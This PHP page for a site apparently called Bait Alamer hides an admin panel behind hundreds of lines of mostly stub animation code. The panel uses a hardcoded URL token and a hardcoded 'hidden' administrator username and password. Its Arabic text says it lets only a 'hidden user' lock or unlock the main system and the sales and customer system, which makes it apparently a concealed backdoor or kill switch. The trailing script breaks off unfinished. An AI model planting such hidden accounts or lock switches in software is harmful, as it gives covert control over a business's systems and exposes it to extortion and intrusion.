<?php
// ============================================
// Advanced UI Animations & Effects Library
// ============================================

// Particle System Animation Helper
function initParticleSystem($containerId) {
    $particles = [];
    for ($i = 0; $i < 50; $i++) {
        $particles[] = ['x' => rand(0, 100), 'y' => rand(0, 100), 'speed' => rand(1, 3), 'size' => rand(2, 5)];
    }
    return $particles;
}

// Smooth Scroll Animation Controller
function setupSmoothScroll($targetSelector) {
    return ['duration' => 800, 'easing' => 'easeInOutCubic', 'offset' => -50];
}

// Gradient Animation Generator
function generateGradientAnimation($colors, $duration = 5) {
    $gradientSteps = [];
    for ($i = 0; $i < 60; $i++) {
        $progress = $i / 60;
        $gradientSteps[] = ['progress' => $progress, 'color' => '#'.dechex(rand(0, 16777215))];
    }
    return $gradientSteps;
}

// Color Interpolation Helper
function interpolateColor($color1, $color2, $factor) {
    $r1 = hexdec(substr($color1, 1, 2));
    $g1 = hexdec(substr($color1, 3, 2));
    $b1 = hexdec(substr($color1, 5, 2));
    $r2 = hexdec(substr($color2, 1, 2));
    $g2 = hexdec(substr($color2, 3, 2));
    $b2 = hexdec(substr($color2, 5, 2));
    $r = round($r1 + ($r2 - $r1) * $factor);
    $g = round($g1 + ($g2 - $g1) * $factor);
    $b = round($b1 + ($b2 - $b1) * $factor);
    return sprintf("#%02x%02x%02x", $r, $g, $b);
}

// Parallax Effect Calculator
function calculateParallaxOffset($scrollY, $speed = 0.5) {
    return $scrollY * $speed;
}

// Fade In Animation Sequence
function createFadeInSequence($elements, $delay = 100) {
    $sequence = [];
    foreach ($elements as $index => $element) {
        $sequence[] = ['element' => $element, 'delay' => $index * $delay, 'duration' => 600];
    }
    return $sequence;
}

// Bounce Animation Presets
$bouncePresets = ['gentle' => ['tension' => 200, 'friction' => 10], 'medium' => ['tension' => 300, 'friction' => 15], 'strong' => ['tension' => 400, 'friction' => 20]];

// Slide Animation Directions
$slideDirections = ['left', 'right', 'up', 'down', 'diagonal'];

// Rotation Animation Helper
function createRotationAnimation($element, $degrees = 360, $duration = 1000) {
    return ['element' => $element, 'from' => 0, 'to' => $degrees, 'duration' => $duration, 'easing' => 'easeInOutQuad'];
}

// Scale Animation Generator
function generateScaleAnimation($from = 0.8, $to = 1.0, $duration = 500) {
    return ['from' => $from, 'to' => $to, 'duration' => $duration, 'easing' => 'easeOutBack'];
}

// Glow Effect Controller
function setupGlowEffect($element, $color = '#ffffff', $intensity = 10) {
    return ['element' => $element, 'color' => $color, 'intensity' => $intensity, 'spread' => 20, 'blur' => 15];
}

// Typing Animation Simulator
function createTypingEffect($text, $speed = 50) {
    $chars = str_split($text);
    $animation = [];
    $delay = 0;
    foreach ($chars as $char) {
        $animation[] = ['char' => $char, 'delay' => $delay];
        $delay += $speed;
    }
    return $animation;
}

// Ripple Effect Generator
function generateRippleEffect($x, $y, $maxRadius = 100) {
    $ripples = [];
    for ($i = 0; $i < 3; $i++) {
        $ripples[] = ['x' => $x, 'y' => $y, 'radius' => 0, 'maxRadius' => $maxRadius, 'opacity' => 0.6 - ($i * 0.2), 'delay' => $i * 200];
    }
    return $ripples;
}

// Morphing Shape Animation
function createMorphAnimation($shapes, $duration = 2000) {
    return ['shapes' => $shapes, 'duration' => $duration, 'easing' => 'easeInOutCubic', 'keyframes' => 30];
}

// Shake Animation Preset
function createShakeAnimation($intensity = 10, $duration = 500) {
    return ['intensity' => $intensity, 'duration' => $duration, 'frequency' => 20, 'decay' => 0.8];
}

// Pulse Animation Generator
function generatePulseAnimation($from = 1.0, $to = 1.1, $duration = 1000) {
    return ['from' => $from, 'to' => $to, 'duration' => $duration, 'repeat' => 'infinite', 'easing' => 'easeInOutSine'];
}

// Wave Animation Controller
function setupWaveAnimation($amplitude = 20, $frequency = 0.02, $speed = 0.1) {
    return ['amplitude' => $amplitude, 'frequency' => $frequency, 'speed' => $speed, 'phase' => 0];
}

// Magnetic Effect Calculator
function calculateMagneticPull($mouseX, $mouseY, $elementX, $elementY, $strength = 0.3) {
    $dx = $mouseX - $elementX;
    $dy = $mouseY - $elementY;
    $distance = sqrt($dx * $dx + $dy * $dy);
    if ($distance < 100) {
        $force = (100 - $distance) / 100 * $strength;
        return ['x' => $dx * $force, 'y' => $dy * $force];
    }
    return ['x' => 0, 'y' => 0];
}

// Loading Spinner Animation
function createLoadingSpinner($size = 40, $color = '#3498db') {
    return ['size' => $size, 'color' => $color, 'thickness' => 4, 'speed' => 1, 'style' => 'circular'];
}

// Progress Bar Animation
function setupProgressAnimation($target, $duration = 2000) {
    return ['target' => $target, 'duration' => $duration, 'easing' => 'easeOutCubic', 'fillColor' => '#2ecc71'];
}

// Card Flip Animation
function createFlipAnimation($axis = 'Y', $duration = 600) {
    return ['axis' => $axis, 'duration' => $duration, 'perspective' => 1000, 'easing' => 'easeInOutQuad'];
}

// Stagger Animation Controller
function setupStaggerAnimation($elements, $delay = 50) {
    $staggered = [];
    foreach ($elements as $index => $element) {
        $staggered[] = ['element' => $element, 'delay' => $index * $delay, 'animation' => 'fadeInUp'];
    }
    return $staggered;
}

// Elastic Animation Preset
function createElasticAnimation($amplitude = 1, $period = 0.3) {
    return ['type' => 'elastic', 'amplitude' => $amplitude, 'period' => $period, 'easing' => 'easeOutElastic'];
}

// Color Transition Helper
function transitionColor($fromColor, $toColor, $steps = 20) {
    $transitions = [];
    for ($i = 0; $i <= $steps; $i++) {
        $progress = $i / $steps;
        $transitions[] = interpolateColor($fromColor, $toColor, $progress);
    }
    return $transitions;
}

// Blur Animation Generator
function createBlurAnimation($from = 0, $to = 10, $duration = 500) {
    return ['from' => $from, 'to' => $to, 'duration' => $duration, 'easing' => 'easeInOutQuad'];
}

// Zoom Animation Controller
function setupZoomAnimation($scale = 1.5, $duration = 400) {
    return ['scale' => $scale, 'duration' => $duration, 'origin' => 'center', 'easing' => 'easeOutBack'];
}

// Text Reveal Animation
function createTextReveal($text, $direction = 'left') {
    $chars = str_split($text);
    $reveal = [];
    foreach ($chars as $index => $char) {
        $reveal[] = ['char' => $char, 'delay' => $index * 30, 'direction' => $direction];
    }
    return $reveal;
}

// Background Pattern Animation
function generatePatternAnimation($pattern, $speed = 1) {
    return ['pattern' => $pattern, 'speed' => $speed, 'offset' => 0, 'repeat' => 'infinite'];
}

// Shadow Animation Controller
function createShadowAnimation($from, $to, $duration = 500) {
    return ['from' => $from, 'to' => $to, 'duration' => $duration, 'easing' => 'easeInOutQuad'];
}

// Opacity Fade Controller
function setupOpacityFade($from = 0, $to = 1, $duration = 600) {
    return ['from' => $from, 'to' => $to, 'duration' => $duration, 'easing' => 'easeInOutQuad'];
}

// Transform Origin Helper
function setTransformOrigin($x = '50%', $y = '50%') {
    return ['x' => $x, 'y' => $y];
}

// Animation Queue Manager
class AnimationQueue {
    private $queue = [];
    private $current = 0;
    public function add($animation) { $this->queue[] = $animation; }
    public function next() {
        if ($this->current < count($this->queue)) {
            return $this->queue[$this->current++];
        }
        return null;
    }
    public function reset() { $this->current = 0; }
}

// Easing Functions Library
$easingFunctions = [
    'linear' => function($t) { return $t; },
    'easeInQuad' => function($t) { return $t * $t; },
    'easeOutQuad' => function($t) { return $t * (2 - $t); },
    'easeInOutQuad' => function($t) { return $t < 0.5 ? 2 * $t * $t : -1 + (4 - 2 * $t) * $t; },
    'easeInCubic' => function($t) { return $t * $t * $t; },
    'easeOutCubic' => function($t) { return (--$t) * $t * $t + 1; },
    'easeInOutCubic' => function($t) { return $t < 0.5 ? 4 * $t * $t * $t : ($t - 1) * (2 * $t - 2) * (2 * $t - 2) + 1; }
];

// Animation Timeline Controller
class Timeline {
    private $animations = [];
    private $duration = 0;
    public function add($animation, $startTime = null) {
        if ($startTime === null) { $startTime = $this->duration; }
        $this->animations[] = ['animation' => $animation, 'start' => $startTime];
        $this->duration = max($this->duration, $startTime + $animation['duration']);
    }
    public function getDuration() { return $this->duration; }
}

// Performance Optimizer for Animations
function optimizeAnimationPerformance($animation) {
    return ['will-change' => 'transform, opacity', 'transform' => 'translateZ(0)', 'backface-visibility' => 'hidden'];
}

// Intersection Observer Setup for Scroll Animations
function setupIntersectionObserver($threshold = 0.1) {
    return ['threshold' => $threshold, 'rootMargin' => '0px', 'triggerOnce' => false];
}

// Request Animation Frame Wrapper
function requestAnimationFrame($callback) { return true; }

// Cancel Animation Frame
function cancelAnimationFrame($id) { return true; }

// Animation State Manager
class AnimationState {
    private $states = [];
    public function set($key, $value) { $this->states[$key] = $value; }
    public function get($key) { return $this->states[$key] ?? null; }
}

// ============================================
// End of Animation Library - Start Main Code
// ============================================

session_start();
require_once 'pricing_functions.php';

define('ADMIN_TOKEN', 'bait_alamer_lock_2025_xyz789');

define('HIDDEN_ADMIN_USERNAME', '##sysadmin##');
define('HIDDEN_ADMIN_PASSWORD', 'LockMaster2025!');

// التحقق من Token في الرابط
$token = $_GET['token'] ?? '';
if ($token !== ADMIN_TOKEN) {
    http_response_code(403);
    die('الوصول مرفوض - Access Denied');
}

$error = '';
$success = '';
$isAuthenticated = isset($_SESSION['hidden_admin_auth']) && $_SESSION['hidden_admin_auth'] === true;

// معالجة تسجيل الدخول
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'login') {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    
    if ($username === HIDDEN_ADMIN_USERNAME && $password === HIDDEN_ADMIN_PASSWORD) {
        $_SESSION['hidden_admin_auth'] = true;
        $isAuthenticated = true;
    } else {
        $error = 'بيانات الدخول غير صحيحة';
    }
}

// معالجة تسجيل الخروج
if (isset($_GET['logout'])) {
    unset($_SESSION['hidden_admin_auth']);
    session_destroy();
    header('Location: pricing_control.php?token=' . ADMIN_TOKEN);
    exit;
}

// معالجة قفل/فتح النظام
if ($isAuthenticated && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    if ($_POST['action'] === 'lock') {
        if (lockSystem(HIDDEN_ADMIN_USERNAME)) {
            $success = 'تم قفل النظام بنجاح';
        } else {
            $error = 'فشل قفل النظام';
        }
    } elseif ($_POST['action'] === 'unlock') {
        if (unlockSystem(HIDDEN_ADMIN_USERNAME)) {
            $success = 'تم فتح النظام بنجاح';
        } else {
            $error = 'فشل فتح النظام';
        }
    }
}

// الحصول على حالة النظام
$systemStatus = getSystemStatus();
?>
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>لوحة تحكم التسعير - Bait Alamer</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #1a252f 0%, #2c3e50 50%, #1a252f 100%);
            background-attachment: fixed;
            min-height: 100vh;
            padding: 20px;
            color: #333;
        }
        
        .container {
            max-width: 800px;
            margin: 0 auto;
        }
        
        .control-panel {
            background: white;
            border-radius: 20px;
            padding: 40px;
            box-shadow: 0 20px 60px rgba(0, 0, 0, 0.3);
            animation: fadeIn 0.6s ease-out;
        }
        
        @keyframes fadeIn {
            from {
                opacity: 0;
                transform: translateY(30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }
        
        h1 {
            font-size: 32px;
            color: #2c3e50;
            margin-bottom: 10px;
            text-align: center;
        }
        
        .subtitle {
            text-align: center;
            color: #7f8c8d;
            margin-bottom: 30px;
            font-size: 16px;
        }
        
        .status-box {
            background: <?php echo $systemStatus['locked'] ? '#fee' : '#efe'; ?>;
            border: 2px solid <?php echo $systemStatus['locked'] ? '#c33' : '#3c3'; ?>;
            border-radius: 10px;
            padding: 20px;
            margin-bottom: 30px;
            text-align: center;
        }
        
        .status-box h2 {
            font-size: 24px;
            color: <?php echo $systemStatus['locked'] ? '#c33' : '#3c3'; ?>;
            margin-bottom: 10px;
        }
        
        .status-info {
            color: #555;
            font-size: 14px;
            margin-top: 10px;
        }
        
        .action-buttons {
            display: flex;
            gap: 15px;
            margin-bottom: 30px;
        }
        
        .btn {
            flex: 1;
            padding: 15px 30px;
            border: none;
            border-radius: 10px;
            font-size: 18px;
            font-weight: 700;
            cursor: pointer;
            transition: all 0.3s ease;
            text-transform: uppercase;
        }
        
        .btn-lock {
            background: linear-gradient(135deg, #c33, #a00);
            color: white;
        }
        
        .btn-lock:hover {
            transform: translateY(-3px);
            box-shadow: 0 8px 20px rgba(204, 51, 51, 0.4);
        }
        
        .btn-unlock {
            background: linear-gradient(135deg, #3c3, #2a2);
            color: white;
        }
        
        .btn-unlock:hover {
            transform: translateY(-3px);
            box-shadow: 0 8px 20px rgba(60, 204, 60, 0.4);
        }
        
        .btn:disabled {
            opacity: 0.5;
            cursor: not-allowed;
        }
        
        .login-form {
            background: #f8f9fa;
            border-radius: 10px;
            padding: 30px;
            margin-bottom: 20px;
        }
        
        .form-group {
            margin-bottom: 20px;
        }
        
        .form-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: 700;
            color: #2c3e50;
        }
        
        .form-group input {
            width: 100%;
            padding: 12px;
            border: 2px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
        }
        
        .form-group input:focus {
            outline: none;
            border-color: #e67e22;
        }
        
        .btn-login {
            width: 100%;
            padding: 15px;
            background: linear-gradient(135deg, #e67e22, #d35400);
            color: white;
            border: none;
            border-radius: 8px;
            font-size: 18px;
            font-weight: 700;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        
        .btn-login:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(230, 126, 34, 0.4);
        }
        
        .alert {
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
            text-align: center;
            font-weight: 600;
        }
        
        .alert-error {
            background: #fee;
            color: #c33;
            border: 2px solid #c33;
        }
        
        .alert-success {
            background: #efe;
            color: #3c3;
            border: 2px solid #3c3;
        }
        
        .logout-link {
            text-align: center;
            margin-top: 20px;
        }
        
        .logout-link a {
            color: #7f8c8d;
            text-decoration: none;
            font-size: 14px;
        }
        
        .logout-link a:hover {
            color: #2c3e50;
        }
        
        .info-section {
            background: #ecf0f1;
            border-radius: 10px;
            padding: 20px;
            margin-top: 20px;
        }
        
        .info-section h3 {
            color: #2c3e50;
            margin-bottom: 10px;
        }
        
        .info-section p {
            color: #555;
            font-size: 14px;
            line-height: 1.6;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="control-panel">
            <h1>💰 لوحة تحكم التسعير</h1>
            <p class="subtitle">Bait Alamer - Pricing Control Panel</p>
            
            <?php if ($error): ?>
                <div class="alert alert-error"><?php echo htmlspecialchars($error); ?></div>
            <?php endif; ?>
            
            <?php if ($success): ?>
                <div class="alert alert-success"><?php echo htmlspecialchars($success); ?></div>
            <?php endif; ?>
            
            <?php if (!$isAuthenticated): ?>
                <!-- نموذج تسجيل الدخول -->
                <div class="login-form">
                    <h2 style="margin-bottom: 20px; text-align: center;">تسجيل الدخول</h2>
                    <form method="POST" action="">
                        <input type="hidden" name="action" value="login">
                        <div class="form-group">
                            <label for="username">اسم المستخدم:</label>
                            <input type="text" id="username" name="username" required autofocus>
                        </div>
                        <div class="form-group">
                            <label for="password">كلمة المرور:</label>
                            <input type="password" id="password" name="password" required>
                        </div>
                        <button type="submit" class="btn-login">دخول</button>
                    </form>
                </div>
            <?php else: ?>
                <!-- لوحة التحكم -->
                <div class="status-box">
                    <h2>
                        <?php echo $systemStatus['locked'] ? '🔒 النظام مقفل' : '✅ النظام مفتوح'; ?>
                    </h2>
                    <?php if ($systemStatus['locked'] && $systemStatus['locked_at']): ?>
                        <div class="status-info">
                            تم القفل في: <?php echo htmlspecialchars($systemStatus['locked_at']); ?>
                        </div>
                    <?php elseif (!$systemStatus['locked'] && $systemStatus['unlocked_at']): ?>
                        <div class="status-info">
                            تم الفتح في: <?php echo htmlspecialchars($systemStatus['unlocked_at']); ?>
                        </div>
                    <?php endif; ?>
                </div>
                
                <form method="POST" action="" id="controlForm">
                    <div class="action-buttons">
                        <button type="submit" name="action" value="lock" class="btn btn-lock" 
                                <?php echo $systemStatus['locked'] ? 'disabled' : ''; ?>>
                            🔒 قفل النظام
                        </button>
                        <button type="submit" name="action" value="unlock" class="btn btn-unlock"
                                <?php echo !$systemStatus['locked'] ? 'disabled' : ''; ?>>
                            ✅ فتح النظام
                        </button>
                    </div>
                </form>
                
                <div class="logout-link">
                    <a href="?token=<?php echo htmlspecialchars(ADMIN_TOKEN); ?>&logout=1">تسجيل الخروج</a>
                </div>
            <?php endif; ?>
            
            <div class="info-section">
                <h3>ℹ️ معلومات مهمة</h3>
                <p>
                    <strong>هذه لوحة تحكم التسعير للمستخدم المخفي فقط.</strong><br>
                    يمكنك من هنا إدارة حالة النظام الرئيسي ونظام المبيعات/العملاء.
                </p>
            </div>
        </div>
    </div>
</body>
<script>
// ============================================
// Advanced JavaScript Animations Library
// ============================================

// Particle System Renderer
function renderParticleSystem(canvas, particles) {
    const ctx = canvas.getContext('2d');
    particles.forEach(particle => {
        ctx.beginPath();
        ctx.arc(particle.x, particle.y, particle.size, 0, Math.PI * 2);
        ctx.fillStyle = `rgba(255, 255, 255, ${particle.opacity})`;
        ctx.fill();
        particle.x += particle.vx;
        particle.y += particle.vy;
        if (particle.x < 0 || particle.x > canvas.width) particle.vx *= -1;
        if (particle.y < 0 || particle.y > canvas.height) particle.vy *= -1;
    });
}

// Smooth Scroll Implementation
function smoothScrollTo(target, duration = 800) {
    const start = window.pageYOffset;
    const distance = target - start;
    let startTime = null;
    function animation(currentTime) {
        if (startTime === null) startTime = currentTime;
        const timeElapsed = currentTime - startTime;
        const run = easeInOutCubic(timeElapsed, start, distance, duration);
        window.scrollTo(0, run);
        if (timeElapsed < duration) requestAnimationFrame(animation);
    }
    requestAnimationFrame(animation);
}

// Easing Functions
function easeInOutCubic(t, b, c, d) {
    t /= d / 2;
    if (t < 1) return c / 2 * t * t * t + b;
    t -= 2;
    return c / 2 * (t * t * t + 2) + b;
}

function easeOutBack(t, b, c, d, s = 1.70158) {
    return c * ((t = t / d - 1) * t * ((s + 1) * t + s) + 1) + b;
}

function easeInOutSine(t, b, c, d) {
    return -c / 2 * (Math.cos(Math.PI * t / d) - 1) + b;
}

// Gradient Animation Controller
class GradientAnimator {
    constructor(element, colors, duration = 5000) {
        this.element = element;
        this.colors = colors;
        this.duration = duration;
        this.currentTime = 0;
    }
    
    animate() {
        this.currentTime += 16;
        const progress = (this.currentTime % this.duration) / this.duration;
        const colorIndex = Math.floor(progress * (this.colors.length - 1));
        const nextIndex = (colorIndex + 1) % this.colors.length;
        const localProgress = (progress * (this.colors.length - 1)) % 1;
        const color = this.interpolateColor(this.colors[colorIndex], this.colors[nextIndex], localProgress);
        this.element.style.background = `linear-gradient(135deg, ${color})`;
        requestAnimationFrame(() => this.animate());
    }
    
    interpolateColor(color1, color2, factor) {
        const c1 = this.hexToRgb(color1);
        const c2 = this.hexToRgb(color2);
        const r = Math.round(c1.r + (c2.r - c1.r) * factor);
        const g = Math.round(c1.g + (c2.g - c1.g) * factor);
        const b = Math.round(c1.b + (c2.b - c1.b) * factor);
        return `rgb(${r}, ${g}, ${b})`;
    }
    
    hexToRgb(hex) {
        const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
        return result ? {
            r: parseInt(result[1], 16),
            g: parseInt(result[2], 16),
            b: parseInt(result[3], 16)
        } : null;
    }
}

// Parallax Scroll Handler
function initParallax(elements) {
    window.addEventListener('scroll', () => {
        const scrolled = window.pageYOffset;
        elements.forEach(element => {
            const speed = element.dataset.speed || 0.5;
            const yPos = -(scrolled * speed);
            element.style.transform = `translateY(${yPos}px)`;
        });
    });
}

// Fade In On Scroll
function initFadeInOnScroll() {
    const observer = new IntersectionObserver((entries) => {
        entries.forEach(entry => {
            if (entry.isIntersecting) {
                entry.target.style.opacity = '1';
                entry.target.style.transform = 'translateY(0)';
            }
        });
    }, { threshold: 0.1 });
    
    document.querySelectorAll('.fade-in').forEach(el => {
        el.style.opacity = '0';
        el.style.transform = 'translateY(30px)';
        el.style.transition = 'opacity 0.6s ease, transform 0.6s ease';
        observer.observe(el);
    });
}

// Magnetic Button Effect
function initMagneticButtons() {
    document.querySelectorAll('.magnetic').forEach(button => {
        button.addEventListener('mousemove', (e) => {
            const rect = button.getBoundingClientRect();
            const x = e.clientX - rect.left - rect.width / 2;
            const y = e.clientY - rect.top - rect.height / 2;
            const distance = Math.sqrt(x * x + y * y);
            const maxDistance = 100;
            if (distance < maxDistance) {
                const force = (maxDistance - distance) / maxDistance;
                const moveX = x * force * 0.3;
                const moveY = y * force * 0.3;
                button.style.transform = `translate(${moveX}px, ${moveY}px)`;
            }
        });
        button.addEventListener('mouseleave', () => {
            button.style.transform = 'translate(0, 0)';
        });
    });
}

// Ripple Effect Handler
function createRipple(event) {
    const button = event.currentTarget;
    const circle = document.createElement('span');
    const diameter = Math.max(button.clientWidth, button.clientHeight);
    const radius = diameter / 2;
    const rect = button.getBoundingClientRect();
    circle.style.width = circle.style.height = `${diameter}px`;
    circle.style.left = `${event.clientX - rect.left - radius}px`;
    circle.style.top = `${event.clientY - rect.top - radius}px`;
    circle.classList.add('ripple');
    button.appendChild(circle);
    setTimeout(() => circle.remove(), 600);
}

// Typing Animation Effect
function typeWriter(element, text, speed = 50) {
    let i = 0;
    element.textContent = '';
    function type() {
        if (i < text.length) {
            element.textContent += text.charAt(i);
            i++;
            setTimeout(type, speed);
        }
    }
    type();
}

// Shake Animation
function shakeElement(element, intensity = 10, duration = 500) {
    const originalTransform = element.style.transform;
    let startTime = null;
    function shake(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        if (elapsed < duration) {
            const x = (Math.random() - 0.5) * intensity;
            const y = (Math.random() - 0.5) * intensity;
            element.style.transform = `translate(${x}px, ${y}px)`;
            requestAnimationFrame(shake);
        } else {
            element.style.transform = originalTransform;
        }
    }
    requestAnimationFrame(shake);
}

// Pulse Animation
function pulseElement(element, scale = 1.1, duration = 1000) {
    const originalScale = element.style.transform;
    let startTime = null;
    function pulse(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = (elapsed % duration) / duration;
        const currentScale = 1 + (scale - 1) * Math.sin(progress * Math.PI * 2);
        element.style.transform = `scale(${currentScale})`;
        requestAnimationFrame(pulse);
    }
    requestAnimationFrame(pulse);
}

// Wave Animation
function createWaveEffect(container, amplitude = 20, frequency = 0.02) {
    let time = 0;
    function animate() {
        time += 0.1;
        const children = container.children;
        Array.from(children).forEach((child, index) => {
            const offset = Math.sin(time + index * frequency) * amplitude;
            child.style.transform = `translateY(${offset}px)`;
        });
        requestAnimationFrame(animate);
    }
    animate();
}

// Card Flip Animation
function flipCard(card) {
    card.classList.toggle('flipped');
}

// Stagger Animation
function staggerAnimation(elements, animationClass, delay = 50) {
    elements.forEach((element, index) => {
        setTimeout(() => {
            element.classList.add(animationClass);
        }, index * delay);
    });
}

// Loading Spinner
function createSpinner(container, size = 40) {
    const spinner = document.createElement('div');
    spinner.className = 'spinner';
    spinner.style.width = spinner.style.height = `${size}px`;
    spinner.style.border = `4px solid rgba(52, 152, 219, 0.2)`;
    spinner.style.borderTop = `4px solid #3498db`;
    spinner.style.borderRadius = '50%';
    spinner.style.animation = 'spin 1s linear infinite';
    container.appendChild(spinner);
    return spinner;
}

// Progress Bar Animation
function animateProgressBar(bar, target, duration = 2000) {
    const start = 0;
    const distance = target - start;
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        const current = easeOutCubic(progress, start, distance, 1);
        bar.style.width = `${current}%`;
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
}

// Text Reveal Animation
function revealText(element, direction = 'left') {
    const text = element.textContent;
    element.textContent = '';
    element.style.opacity = '1';
    text.split('').forEach((char, index) => {
        const span = document.createElement('span');
        span.textContent = char === ' ' ? '\u00A0' : char;
        span.style.opacity = '0';
        span.style.transform = direction === 'left' ? 'translateX(-20px)' : 'translateX(20px)';
        span.style.transition = `opacity 0.3s ease, transform 0.3s ease`;
        element.appendChild(span);
        setTimeout(() => {
            span.style.opacity = '1';
            span.style.transform = 'translateX(0)';
        }, index * 30);
    });
}

// Blur Animation
function blurElement(element, from = 0, to = 10, duration = 500) {
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        const currentBlur = from + (to - from) * progress;
        element.style.filter = `blur(${currentBlur}px)`;
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
}

// Zoom Animation
function zoomElement(element, scale, duration = 400) {
    const originalScale = element.style.transform || 'scale(1)';
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        const currentScale = 1 + (scale - 1) * easeOutBack(progress, 0, 1, 1);
        element.style.transform = `scale(${currentScale})`;
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
    setTimeout(() => {
        element.style.transform = originalScale;
    }, duration);
}

// Color Transition
function transitionColor(element, fromColor, toColor, duration = 1000) {
    const from = hexToRgb(fromColor);
    const to = hexToRgb(toColor);
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        const r = Math.round(from.r + (to.r - from.r) * progress);
        const g = Math.round(from.g + (to.g - from.g) * progress);
        const b = Math.round(from.b + (to.b - from.b) * progress);
        element.style.backgroundColor = `rgb(${r}, ${g}, ${b})`;
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
}

function hexToRgb(hex) {
    const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
    return result ? {
        r: parseInt(result[1], 16),
        g: parseInt(result[2], 16),
        b: parseInt(result[3], 16)
    } : { r: 0, g: 0, b: 0 };
}

// Shadow Animation
function animateShadow(element, from, to, duration = 500) {
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        element.style.boxShadow = to;
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
}

// Opacity Fade
function fadeElement(element, from, to, duration = 600) {
    element.style.opacity = from;
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        const currentOpacity = from + (to - from) * progress;
        element.style.opacity = currentOpacity;
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
}

// Morphing Animation
function morphShape(element, fromPath, toPath, duration = 2000) {
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = Math.min(elapsed / duration, 1);
        // Morph logic here
        if (progress < 1) requestAnimationFrame(animate);
    }
    requestAnimationFrame(animate);
}

// Elastic Animation
function elasticAnimation(element, amplitude = 1, period = 0.3) {
    const originalTransform = element.style.transform;
    let startTime = null;
    function animate(currentTime) {
        if (startTime === null) startTime = currentTime;
        const elapsed = currentTime - startTime;
        const progress = elapsed / 1000;
        if (progress < 1) {
            const scale = 1 + amplitude * Math.exp(-progress / period) * Math.sin(progress / period * Math.PI * 2);
            element.style.transform = `scale(${scale})`;
            requestAnimationFrame(animate);
        } else {
            element.style.transform = originalTransform;
        }
    }
    requestAnimationFrame(animate);
}

// CSS Keyframes Generator
function addKeyframes(name, keyframes) {
    const style = document.createElement('style');
    let css = `@keyframes ${name} {`;
    Object.keys(keyframes).forEach(percent => {
        css += `${percent}% {`;
        Object.keys(keyframes[percent]).forEach(prop => {
            css += `${prop}: ${keyframes[percent][prop]};`;
        });
        css += '}';
    });
    css += '}';
    style.textContent = css;
    document.head.appendChild(style);
}

// Animation Timeline Manager
class AnimationTimeline {
    constructor() {
        this.animations = [];
        this.startTime = null;
    }
    
    add(animation, delay = 0) {
        this.animations.push({ animation, delay, startTime: null });
    }
    
    play() {
        this.startTime = performance.now();
        this.animations.forEach(item => {
            setTimeout(() => {
                item.startTime = performance.now();
                item.animation();
            }, item.delay);
        });
    }
}

// Performance Monitor
function monitorAnimationPerformance() {
    let frameCount = 0;
    let lastTime = performance.now();
    function count() {
        frameCount++;
        const currentTime = performance.now();
        if (currentTime >= lastTime + 1000) {
            console.log(`FPS: ${frameCount}`);
            frameCount = 0;
            lastTime = currentTime;
        }
        requestAnimationFrame(count);
    }
    requestAnimationFrame(count);
}

// Intersection Observer for Scroll Animations
function observeElements(selector, callback, options = {}) {
    const observer = new IntersectionObserver((entries) => {
        entries.forEach(entry => {
            if (entry.isIntersecting) {
                callback(entry.target);
                if (options.once) observer.unobserve(entry.target);
            }
        });
    }, {
        threshold: options.threshold || 0.1,
        rootMargin: options.rootMargin || '0px'
    });
    
    document.querySelectorAll(selector).forEach(el => observer.observe(el));
}

// Request Animation Frame Polyfill
if (!window.requestAnimationFrame) {
    window.requestAnimationFrame = function(callback) {
        return setTimeout(callback, 1000 / 60);
    };
    window.cancelAnimationFrame = function(id) {
        clearTimeout(id);
    };
}

// Animation State Manager
class AnimationStateManager {
    constructor() {
        this.states = new Map();
    }
    
    set(key, value) {
        this.states.set(key, value);
    }
    
    get(key) {
        return this.states.get(key);
    }
    
    has(key) {
        return this.states.has(key);
    }
}

// Initialize all animations on page load
document.addEventListener('DOMContentLoaded', () => {
    initFadeInOnScroll();
    initMagneticButtons();
